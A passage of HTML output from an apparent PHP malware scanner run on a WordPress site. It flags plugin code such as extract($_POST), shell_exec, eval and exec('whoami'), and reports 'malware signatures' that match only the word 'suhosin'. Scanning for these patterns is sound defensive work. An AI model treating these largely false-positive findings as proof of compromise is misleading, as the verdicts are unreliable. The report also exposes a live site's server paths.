#0000BB">$factor</span><span style="color: #007700">))&nbsp;.&nbsp;(isset(</span><span style="color: #0000BB">$sz</span><span style="color: #007700">[</span><span style="color: #0000BB">$factor</span><span style="color: #007700">])&nbsp;?&nbsp;</span><span style="color: #0000BB">$sz</span><span style="color: #007700">[</span><span style="color: #0000BB">$factor</span><span style="color: #007700">]&nbsp;:&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi_get_remote_image_ext'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">pmxi_get_remote_image_ext</span><span style="color: #007700">(</span><span style="color: #0000BB">$fil</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_190").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/wp-all-import/actions/wp_ajax_import_failed.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 799.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_191" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit extract_global <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">extract</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_191").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/wp-all-import/controllers/controller/admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.84 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_192" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$str'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;"http://"&nbsp;==&nbsp;$str&nbsp;||&nbsp;"ftp://"&nbsp;==&nbsp;$str&nbsp;?&nbsp;""&nbsp;:&nbsp;$str;'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">input</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">addFilter</span><span style="color: #007700">(</span><span style="color: #0000BB">$filter</span><span style="color: #007700">);&nbsp;}&nbsp;global&nbsp;</span><span style="color: #0000BB">$wp_styles</span><span style="color: #007700">;&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">is_a</span><span style="color: #007700">(</span><span style="color: #0000BB">$wp_styles</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'WP_Styles'</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$wp_styles&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">WP_Styles</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'jquery-ui'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/js/jquery/css/redmond/jquery-ui.css'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'jquery-tipsy'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/js/jquery/css/smoothness/jquery.tipsy.css'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi-admin-style'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/css/a...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_192").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/duplicator/views/tools/diagnostics/inc.settings.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.61 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_193" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_193").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/ctrls/ctrl.s1.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_194" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ERR_SHELLEXEC_ZIPOPEN</span><span style="color: #007700">.</span><span style="color: #DD0000">":&nbsp;</span><span style="color: #0000BB">$stderr</span><span style="color: #DD0000">"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">"&lt;br/&gt;&lt;br/&gt;&lt;b&gt;To&nbsp;resolve&nbsp;error&nbsp;see&nbsp;&lt;a&nbsp;href='https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q'&nbsp;target='_blank'&gt;https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q&lt;/a&gt;&lt;/b&gt;"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">error</span><span style="color: #007700">(</span><span style="color: #0000BB">$zip_err_msg</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"&lt;&lt;&lt;&nbsp;Shell-Exec&nbsp;Unzip&nbsp;Complete."</span><span style="color: #007700">);&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">'ziparchive'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"\n\nSTART&nbsp;ZIP&nbsp;FILE&nbsp;EXTRACTION&nbsp;STANDARD&nbsp;&gt;&gt;&gt;&nbsp;"</span><span style="color: #007700">);&nbsp;if&nbsp;(!class...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">SUHOSIN</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_194").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/views/view.s1.base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 59.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_195" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Suhosin</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_195").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/assets/inc.libs.js.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 527.37 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_196" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'('</span><span style="color: #007700">+</span><span style="color: #0000BB">text</span><span style="color: #007700">+</span><span style="color: #DD0000">')'</span><span style="color: #007700">);return&nbsp;</span><span style="color: #0000BB">typeof&nbsp;filter</span><span style="color: #007700">===</span><span style="color: #DD0000">'function'</span><span style="color: #007700">?</span><span style="color: #0000BB">walk</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,</span><span style="color: #0000BB">j</span><span style="color: #007700">):</span><span style="color: #0000BB">j</span><span style="color: #007700">;}<br />throw&nbsp;new&nbsp;</span><span style="color: #0000BB">SyntaxError</span><span style="color: #007700">(</span><span style="color: #DD0000">'parseJSON'</span><span style="color: #007700">);}};}();}<br />&lt;/</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /><br />&lt;</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /></span><span style="color: #FF8000">/**<br />&nbsp;*&nbsp;password_strength_plugin.js<br />&nbsp;*&nbsp;Copyright&nbsp;(c)&nbsp;20010&nbsp;myPocket&nbsp;technologies&nbsp;(www.mypocket-technologies.com)<br />&nbsp;*&nbsp;@author&nbsp;Darren&nbsp;Mason&nbsp;(djmason9@gmail.com)<br />&nbsp;*&nbsp;@date&nbsp;3/13/2009<br />&nbsp;*&nbsp;@projectDescription&nbsp;Password&nbsp;Strength&nbsp;Meter&nbsp;is&nbsp;a&nbsp;jQuery&nbsp;plug-in&nbsp;provide&nbsp;you&nbsp;smart&nbsp;algorithm&nbsp;to&nbsp;detect&nbsp;a&nbsp;password&nbsp;strength.&nbsp;<br />&nbsp;*&nbsp;Based&nbsp;on&nbsp;Firas&nbsp;Kassem&nbsp;orginal&nbsp;plugin&nbsp;-&nbsp;phiras.wordpress.com/20...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)))if(</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]){if(</span><span style="color: #0000BB">9</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">){if(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">),!</span><span style="color: #0000BB">h</span><span style="color: #007700">||!</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">parentNode</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">;if(</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else&nbsp;if(</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">&amp;&amp;(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">))&amp;&amp;</span><span style="color: #0000BB">t</span><span style="color: #007700">(</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">h</span><span style="color: #007700">)&amp;&amp;</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else{if(</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByTagName</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">;if((</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">])&amp;&amp;</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">}if(</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">qsa</span><span style="color: #007700">&amp;&amp;(!</span><span style="color: #0000BB">q</span><span style="color: #007700">||!</span><span style="color: #0000BB">q</span><span style="color: #007700">.</span><span style="color: #0000BB">test</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">))){if(</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">u</span><span style="color: #007700">,</span><span style="color: #0000BB">w</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">x</span><span style="color: #007700">=</span><span style="color: #0000BB">1</span><span style="color: #007700">!==</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">1</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #DD0000">"object"</span><span style="color: #007700">!==</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">nodeName</span><span style="color: #007700">.</span><span style="color: #0000BB">toLowerCase</span><span style="color: #007700">()){</span><span style="color: #0000BB">o</span><span style="color: #007700">=</span><span style="color: #0000BB">g</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">),(</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">"id"</span><span style="color: #007700">))?</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(</span><span style="color: #0000BB">bb</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">c</span><span style="color: #007700">,</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">e</span><span style="color: #007700">,</span><span style="color: #0000BB">f</span><span style="color: #007700">,</span><span style="color: #0000BB">g</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_196").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/classes/class.server.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_197" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'echo&nbsp;duplicator'</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">get_unzip_filepath</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">is_shell_exec_available</span><span style="color: #007700">())&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash&nbsp;unzip&nbsp;2&gt;&amp;1'</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">NULL</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'unzip'</span><span style="color: #007700">;&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">=&nbsp;array(</span><span style="color: #DD0000">'/usr/bin/unzip'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'/opt/local/bin/unzip'</span><span style="color: #007700">);&nbsp;foreach&nbsp;(</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">;&nbsp;break;&nbsp;}&nbsp;}&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">$filepath</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">isWordPress</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$search_list&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">','</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$wpCo</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_197").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/classes/config/class.constants.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_198" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_198").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/duplicator/classes/utilities/class.u.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.63 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:31</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 3</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_199" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'whoami'</span><span style="color: #007700">);&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getpwuid'</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_geteuid'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_geteuid</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$user</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;?&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;catch&nbsp;(</span><span style="color: #0000BB">Exception&nbsp;$ex</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">initSnapshotDirectory</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span 